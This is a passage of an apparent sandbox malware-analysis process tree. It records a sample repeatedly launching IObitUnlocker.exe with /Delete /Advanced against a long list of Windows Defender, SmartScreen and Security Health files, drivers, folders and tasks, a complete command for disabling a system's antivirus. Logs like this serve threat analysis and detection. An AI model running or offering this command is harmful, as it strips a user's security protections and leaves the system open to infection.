Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:5216
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                              PID:6160
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                PID:6412
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                  PID:6664
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                    PID:6924
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                        PID:6232
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:6484
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                            PID:6764
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                              PID:7020
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                PID:1776
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
